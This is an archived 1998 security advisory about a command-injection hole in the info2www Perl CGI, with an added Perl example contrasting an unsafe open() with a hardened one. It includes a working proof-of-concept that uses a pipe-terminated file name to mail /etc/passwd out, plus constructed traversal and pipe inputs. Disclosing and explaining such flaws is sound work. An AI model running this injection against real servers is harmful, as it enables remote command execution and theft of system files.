info2www CGI hole

Summary
Description: Another dumb CGI blindly using the (magical) Perl open()
Author: Niall Smart <njs3@DOC.IC.AC.UK>
Compromise: execute arbitrary commands as web server's UID (remote)
Vulnerable Systems: Those running a vulnerable version of the info2www CGI
Date: 3 March 1998
Details


Date: Tue, 3 Mar 1998 11:26:49 +0000
From: Niall Smart <njs3@DOC.IC.AC.UK>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerabilities in some versions of info2www CGI

Hi,

Some versions of the info2www CGI blindly open files:

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
You have new mail.
$

Trying to track down which versions of info2www have this bug and which
don't has been difficult; there are lots of variants out there, some
of which aren't vulnerable.  Instead of trying to make a list of versions
which are vulnerable I'll just say that:

 - if it has no version number, it's probably vulnerable
 - the uuencoded version at CPAN is corrupt, and the one
   which the README file tells you to get is vulnerable
 - version 1.1 is vulnerable
 - version 1.2.x seems ok (but I'm no perl expert)

Apparently info2www is based on info2html and infogate, so these may
have problems too.

Niall
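
The pattern behind this class of bug, shown as an added Perl example (not code from info2www or from the original post): a two-argument open() on a request-derived name beside a hardened form that allowlists the name and uses three-argument open(). The names open_info_unsafe, open_info_safe and $INFO_DIR are hypothetical, the way the name is joined to a directory is an assumption, and the sample file and inputs are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Hypothetical names throughout; this is not info2www source code.
my $INFO_DIR = tempdir(CLEANUP => 1);

# Constructed sample Info file so the script runs offline.
open(my $seed, '>', File::Spec->catfile($INFO_DIR, 'emacs.info')) or die $!;
print {$seed} "File: emacs.info,  Node: Top\n";
close($seed);

# BEFORE: two-argument open. Perl reads the mode out of the string itself,
# so a value ending in "|" is run as a command instead of being opened as
# a file, and "../" components walk out of the intended directory.
sub open_info_unsafe {
    my ($name) = @_;
    open(my $fh, "$INFO_DIR/$name") or return;   # do not use
    return $fh;
}

# AFTER: allowlist the name first, then use three-argument open, where
# the mode is fixed to '<' and the path is never parsed for a mode or pipe.
sub open_info_safe {
    my ($name) = @_;
    return unless defined $name
        && $name =~ /\A[A-Za-z0-9_+-][A-Za-z0-9_.+-]*\z/;
    my $path = File::Spec->catfile($INFO_DIR, $name);
    return unless -f $path;                      # regular files only
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed inputs: one legitimate file name, then values shaped like
# the request in the advisory (directory traversal, trailing pipe).
for my $name ('emacs.info', '../../etc/hosts', '(../bin/true|)', 'emacs.info|') {
    my $fh = open_info_safe($name);
    printf "%-18s %s\n", $name, $fh ? 'opened read-only' : 'rejected';
    close($fh) if $fh;
}
```

Only open_info_safe is called; running the CGI under Perl's taint mode (-T) adds a second check, since tainted request data then cannot reach a piped open without first being validated.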

This page is part of Fyodor's exploit world.